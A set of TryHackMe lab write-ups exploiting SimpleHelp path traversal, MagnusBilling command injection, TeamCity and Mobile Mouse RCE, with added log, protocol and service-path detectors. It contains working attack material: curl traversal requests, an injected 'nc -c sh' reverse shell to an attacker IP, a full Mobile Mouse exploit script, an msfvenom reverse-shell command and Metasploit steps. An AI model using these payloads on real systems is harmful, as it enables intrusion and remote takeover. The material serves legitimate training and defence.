Try Hack Me Write-ups

Solutions to some Try Hack Me

Try Hack Me/SimpleHelp

Write-up / THM / SimpleHelp: CVE-2024-57727 

by: alfreddgreat

Get the Python proof-of-concept (PoC) script for the vulnerability from https://github.com/imjdl/CVE-2024-57727.

root@ip-10-10-65-98:~# git clone https://github.com/imjdl/CVE-2024-57727

Change directory to the downloaded CVE folder.

root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/

Run the following python script.

root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py http://10.10.32.37

Check the poc.py script

import ssl  # needed by the excerpt below


def send_path_traversal_request(url: str) -> bool:
    """
    Send a path traversal request and get the response

    Args:
        url (str): Target url address
    Returns:
        dict: Dictionary containing response information, including status code, response content, etc.
        None: Returns None if request fails
    """
    url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"
    context = ssl._create_unverified_context()
    # Default request headers
    default_headers = {
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept': '*/*',
        'Connection': 'keep-alive'
    }

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt

THM{9ND23PVA}

"Choose your path wisely, but your shoes comfortably."

"Traverse lightly, laugh loudly."

THM{9ND23PVA}

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt

THM{X8733EEZ}


"Some paths are meant to be traversed; others just lead to a 404."

THM{X8733EEZ}

Try Hack Me/Billing

Write-up / THM / Billing

by:

Start the Virtual Machine

Run an nmap scan against the VM.

From the nmap scan:  nmap -sS -sC -sV IP_THM_VM_machine

Ports 22, 80, and 3306 are open

The VM is a Debian Linux machine.

Connect to port 80 using a web browser

nc -c sh 10.10.209.29 9001

10.10.233.21/mbilling/lib/icepay/icepay.php?democ=/dev/null; nc -c sh 10.10.209.29 9001

listen with nc

nc -lnvp 9001

python -c 'import os; os.system("/bin/sh")'

https://www.linkedin.com/pulse/linux-privesc-fail2ban-exploit-ahnaf-abrar-hasin/

https://eldstal.se/advisories/230327-magnusbilling.html

Security advisory

A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.

Affected products

magnusbilling 7 up to and including commit 7af21ed620

magnusbilling 6 (all versions)

Steps to reproduce

The following proof of concept uses a harmless sleep 30 command as a payload.

  1. Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
  2. Observe that the page takes 30 seconds to load
  3. Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
  4. Observe that the page takes only 3 seconds to load

Cause

A piece of demonstration code is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.

Impact

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data. At a minimum, this allows an attacker to compromise the billing system and its database.

Proposed Mitigation

Remove the demo code from icepay.php.

History
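Both issues above leave a distinctive request target in the web server's access log: the SimpleHelp PoC sends a raw '..' path that a normal client would have normalized away (which is why the curl commands need --path-as-is), and the magnusbilling PoC sends shell metacharacters in the democ parameter. The following detector is an added example, not part of the write-up, the PoC repository or the advisory; its log lines are constructed in combined log format with made-up client IPs.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in combined log format (made-up client IPs). The first
# two carry the SimpleHelp traversal paths from the write-up (one URL-encoded), the
# third the magnusbilling icepay.php injection from the advisory; the last is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Mar/2025:22:19:01 +0000] "GET /toolbox-resource/../resource1/../../configuration/serverconfig.xml HTTP/1.1" 200 4821
10.0.0.5 - - [30/Mar/2025:22:19:02 +0000] "GET /toolbox-resource/..%2fsecmsg/..%2f..%2fconfiguration/flag.txt HTTP/1.1" 200 97
10.0.0.7 - - [30/Mar/2025:22:20:10 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a HTTP/1.1" 200 12
10.0.0.9 - - [30/Mar/2025:22:21:00 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=demo HTTP/1.1" 200 12
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[;&|`$]")  # characters that end one shell command and start another


def has_traversal(raw_path: str) -> bool:
    """True if the decoded request path still contains a '..' segment.

    Browsers and curl (without --path-as-is) collapse such segments before sending,
    so a '..' that reaches the server is a deliberate attempt to leave a resource root.
    """
    return ".." in unquote(raw_path).split("/")


def query_params(raw_query: str) -> dict:
    """Minimal query parser: split on '&' only, so a ';' inside a value is preserved."""
    params = {}
    for pair in filter(None, raw_query.split("&")):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def democ_injection(raw_target: str) -> bool:
    """True if an icepay.php request carries shell metacharacters in the democ parameter."""
    parts = urlsplit(raw_target)
    if not parts.path.endswith("/lib/icepay/icepay.php"):
        return False
    return any(SHELL_META.search(v) for v in query_params(parts.query).get("democ", []))


def scan_access_log(text: str) -> list:
    """Return (client_ip, rule_name, request_target) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        target = match.group("target")
        client_ip = line.split(" ", 1)[0]
        if has_traversal(urlsplit(target).path):
            hits.append((client_ip, "path-traversal", target))
        if democ_injection(target):
            hits.append((client_ip, "icepay-command-injection", target))
    return hits


if __name__ == "__main__":
    for client_ip, rule, target in scan_access_log(SAMPLE_LOG):
        print(f"{client_ip} {rule} {target}")
```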

Try Hack Me/Brains

Write-up / THM / Brains

by: alfreddgreat

Start the Virtual Machine

Run an nmap scan against the VM.

From the nmap scan:  nmap -sS -sC -sV IP_THM_VM_machine

Ports 22, 80, and 50000 are open

The VM is an Ubuntu Linux machine.

Connect to port 80 using a web browser

In the nmap result, port 50000 is also open and, judging from the fingerprint, it is an HTTP server:

50000/tcp open  ibm-db2?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 401 
|     TeamCity-Node-Id: MAIN_SERVER
|     WWW-Authenticate: Basic realm="TeamCity"
|     WWW-Authenticate: Bearer realm="TeamCity"
|     Cache-Control: no-store
|     Content-Type: text/plain;charset=UTF-8
|     Date: Fri, 18 Oct 2024 01:48:03 GMT
|     Connection: close
|     Authentication required
|     login manually go to "/login.html" page
|   drda, ibm-db2, ibm-db2-das: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Fri, 18 Oct 2024 01:48:03 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 

TeamCity-Node-Id: MAIN_SERVER

Connect to port 50000 using the web browser

The web server on port 50000 is running TeamCity version 2023.11.3 (build 147512).

Search the internet for vulnerabilities affecting TeamCity 2023.11.3.

https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/

This TeamCity version has a remote code execution (RCE) vulnerability.

Check whether the Metasploit Framework has modules for the TeamCity vulnerabilities CVE-2024-27198 and CVE-2024-27199.

Run msfconsole

Modules 3, 4, 5, 6, 7 and 8 can be used for CVE-2024-27198, but we do not yet know whether the target should be Java, Windows, Linux or Unix.

Detect the technology used by the web server through banner grabbing; Wappalyzer can be used for this.

In Wappalyzer, under Web Servers, Apache Tomcat is listed, which means the application runs on Java.

Therefore, in msfconsole, we use module 4, whose target is Java.

In the msfconsole:   msf6 > use 4

Then run options to see what the exploit needs. Options marked yes in the Required column are mandatory.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options

RHOSTS and RPORT must be filled in, and LHOST must be an IP address the VM can reach. Since the machine is reached over the VPN, LHOST is the VPN IP assigned to the Kali machine.

Set the following values

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOSTS 10.10.170.24

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RPORT 50000

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set LHOST 10.11.80.68

Note: 10.10.170.24 is the THM VM, 50000 is the TeamCity application port and 10.11.80.68 is the VPN IP of the Kali machine.

Now check if the options are set successfully. Run the options command to see the set values.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options

Now we can run the exploit

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > run -j

If the prompt does not return, press Enter until the following appears.

Then run sessions to list the session that was created.

Meterpreter session 1 opened (10.11.80.68:4444 -> 10.10.170.24:54368) at 2024-10-17 22:38:00 -0400

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions

There is 1 session created and connected to the target machine (THM-VM-machine).

Connect to the session with the command sessions 1

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions 1

Now we have a Meterpreter session on the machine. We can move around with Meterpreter commands or drop into a system shell with the shell command.

meterpreter > shell

Now we are in the target's shell. To get a proper prompt, start an interactive shell:

/bin/bash -i

Now we are inside the VM machine in the directory /opt/teamcity/TeamCity/bin

The question to answer on tryhackme.com is the following:

The needed flag is in the /home directory where a user exists.

Change to the /home directory to see which user exists, then list its contents with ls:

ubuntu@brains:/opt/teamcity/TeamCity/bin$ cd /home

The user is ubuntu.

Change directory to the user directory and get the content of the flag.txt file.

ubuntu@brains:/home$ cd ubuntu

ubuntu@brains:/home$ ls -l

ubuntu@brains:/home$ cat flag.txt

FLAG: THM{faa9bac345709b6620a6200b484c7594}

Connect to the machine 10.10.74.225 on port 8000 using a browser.

Try Hack Me/Mouse Trap

Try Hack Me / Mouse Trap

by: alfreddgreat

root@ip-10-10-123-135:~# nmap -sS -sC -sV 10.10.162.0

root@ip-10-10-123-135:~# nmap -sS -sC -sV -O 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:19 BST
Nmap scan report for 10.10.162.0
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MOUSETRAP
|   NetBIOS_Domain_Name: MOUSETRAP
|   NetBIOS_Computer_Name: MOUSETRAP
|   DNS_Domain_Name: MOUSETRAP
|   DNS_Computer_Name: MOUSETRAP
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-30T21:22:42+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-12-08T13:53:36
|_Not valid after:  2025-06-09T13:53:36
|_ssl-date: 2025-03-30T21:23:10+00:00; 0s from scanner time.
9099/tcp open  unknown
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK 
|     Server: Mobile Mouse Server 
|     Content-Type: text/html 
|     Content-Length: 326
|_    <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp open  abyss?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:23:36:E3:FF:87 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MOUSETRAP, NetBIOS user: <unknown>, NetBIOS MAC: 02:23:36:e3:ff:87 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-30T21:22:42
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.34 seconds

root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:04 BST
Nmap scan report for 10.10.162.0
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open  ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
9099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
9999/tcp open  abyss
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:23:36:E3:FF:87 (Unknown)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 59.82 seconds

Open port 9099 in the browser.

In the first (version detection) scan we see that port 9099 runs a Mobile Mouse Server.

Searching the internet for an exploit turns up the following GitHub repository:

https://github.com/blue0x1/mobilemouse-exploit?tab=readme-ov-file

Using the V2 version: CVE-2023-31902-v2.py

#!/usr/bin/env python3
# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2
# Date: Apr 28, 2023
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763

import socket
from time import sleep
import argparse
import threading
from impacket import smbserver

def smb_server(lhost, file_to_serve):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("share", ".", "")
    server.start()

help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload", required=True)
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")

args = parser.parse_args()

host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099 # Default port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)
s.connect((host, port))


smb_server_thread = threading.Thread(target=smb_server, args=(lhost, command_shell))
smb_server_thread.start()

CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)

RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)

sleep(0.5)

payload = f"cmd.exe /c start /B \\\\{lhost}\\share\\{command_shell}".encode('utf-8')
hex_payload = payload.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)

print("Take The rose...")

sleep(30)
s.close()

Save the code above as mousemobile.py.

Now create a reverse shell executable with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP_LOCAL_MACHINE LPORT=PORT_LOCAL -f exe > shell-x64.exe

Run mousemobile.py with shell-x64.exe as the file to be executed.

Note that shell-x64.exe was generated with port 446 as its listener port (LPORT).

First open a terminal and run the following command

nc -lnvp 446

Leave it running, open another terminal, and exploit the Mobile Mouse application with the Python script:

python3 mousemobile.py --target 10.10.162.0 --lhost 10.10.123.135 --file shell-x64.exe

The first terminal, where netcat is listening, should now have received the connection.

Now we have a Windows shell.

Get the flag from user.txt.

THM{Terry_mouse_2_rce}
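The CONN and KEY byte strings in the script above are the Mobile Mouse wire format: fields separated by 0x1E and frames terminated by 0x04. The parser below is an added example, not from the write-up or the exploit repository; it decodes a captured stream and flags KEY frames that type a whole string instead of a single key, which is the pattern a network sensor would alert on. The field meanings (key code, text, modifier) are inferred from the script, and the sample stream is constructed from its bytes with a placeholder host and file name.

```python
# Wire format observed in CVE-2023-31902-v2.py above: fields separated by 0x1E (ASCII
# record separator), frames terminated by 0x04 (EOT). Field meanings are inferred from
# the script, not taken from a protocol specification.
FIELD_SEP = b"\x1e"
FRAME_END = b"\x04"

# Constructed sample stream: the CONNECT and KEY frames from the script, byte for byte,
# then a KEY frame typing a command line with a placeholder UNC host and file name.
CONNECT = bytes.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
RUN_DIALOG = bytes.fromhex("4b45591e3131341e721e4f505404")   # key code 114 ('r') with the OPT modifier
TYPED_COMMAND = b"cmd.exe /c start /B \\\\10.0.0.1\\share\\payload.exe"
TYPE_STRING = b"KEY\x1e100\x1e" + TYPED_COMMAND + b"\x1e\x04"
PRESS_ENTER = bytes.fromhex("4b45591e2d311e454e5445521e04")  # key code -1, named key "ENTER"
SAMPLE_STREAM = CONNECT + RUN_DIALOG + TYPE_STRING + PRESS_ENTER

# Key names the client sends as words rather than single characters (assumed list).
NAMED_KEYS = {"ENTER", "OPT", "TAB", "ESC", "BACKSPACE", "DELETE"}


def parse_frames(stream: bytes) -> list:
    """Split a raw stream into frames; each frame is a list of str fields.

    latin-1 maps every byte value 1:1, so unexpected bytes never raise here.
    """
    frames = []
    for raw in stream.split(FRAME_END):
        if raw:  # skip the empty tail after the final terminator
            frames.append([f.decode("latin-1") for f in raw.split(FIELD_SEP)])
    return frames


def flag_injected_text(frames: list) -> list:
    """Return the text of KEY frames that inject a whole string rather than one keystroke.

    Layout assumed from the script: ["KEY", key_code, text_or_key_name, modifier?].
    A real keystroke is one character or a named key; the exploit types its entire
    command line in a single frame, which is the signal a sensor can alert on.
    """
    hits = []
    for fields in frames:
        if len(fields) < 3 or fields[0] != "KEY":
            continue
        text = fields[2]
        if len(text) > 1 and text.upper() not in NAMED_KEYS:
            hits.append(text)
    return hits


if __name__ == "__main__":
    decoded = parse_frames(SAMPLE_STREAM)
    for fields in decoded:
        print(fields)
    print("injected:", flag_injected_text(decoded))
```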

Exploiting the Unquoted Path

Search for services with unquoted paths using the command below.

Using SharpUp.exe

C:\Users\purpletom>SharpUp.exe audit
SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Services with Unquoted Paths ===
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
	Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.

'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.
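SharpUp reports prefixes of the HelperService.exe path because that is how Windows resolves an unquoted image path containing spaces: it tries each space-delimited prefix as an executable before the full path. The following is an added example, not from the write-up or from SharpUp, that reproduces that resolution order for the path above, lists the directories whose permissions an audit has to check, and shows the quoted form that fixes the service; it is pure string logic and runs on any platform.

```python
import ntpath

# Service image path exactly as SharpUp reported it above, and its quoted form.
UNQUOTED = r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe"
QUOTED = '"' + UNQUOTED + '"'


def is_quoted(image_path: str) -> bool:
    return image_path.startswith('"') and image_path.endswith('"')


def lookup_candidates(image_path: str) -> list:
    """Executables Windows tries, in order, when it resolves an unquoted ImagePath.

    CreateProcess takes the text up to the first space as the program (adding .exe),
    then extends it to the next space, and so on, until something exists.
    A quoted path yields only itself.
    """
    if is_quoted(image_path):
        return [image_path.strip('"')]
    words = image_path.split(" ")
    candidates = [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]
    candidates.append(image_path)
    return candidates


def directories_to_audit(image_path: str) -> list:
    """Directories where a stray file would be picked up before the real binary.

    These are the parents of every candidate except the genuine executable. The
    service is exposed only if a non-admin user can create files in one of them,
    which is what the 'is modifable' lines from SharpUp point at.
    """
    dirs = []
    for candidate in lookup_candidates(image_path)[:-1]:
        parent = ntpath.dirname(candidate)
        if parent not in dirs:
            dirs.append(parent)
    return dirs


def quote_image_path(image_path: str) -> str:
    """The fix: wrap the whole path in double quotes so no prefix is ever tried."""
    return image_path if is_quoted(image_path) else '"' + image_path + '"'


if __name__ == "__main__":
    for candidate in lookup_candidates(UNQUOTED):
        print("tries:", candidate)
    print("audit permissions on:", directories_to_audit(UNQUOTED))
    print("fixed ImagePath:", quote_image_path(UNQUOTED))
```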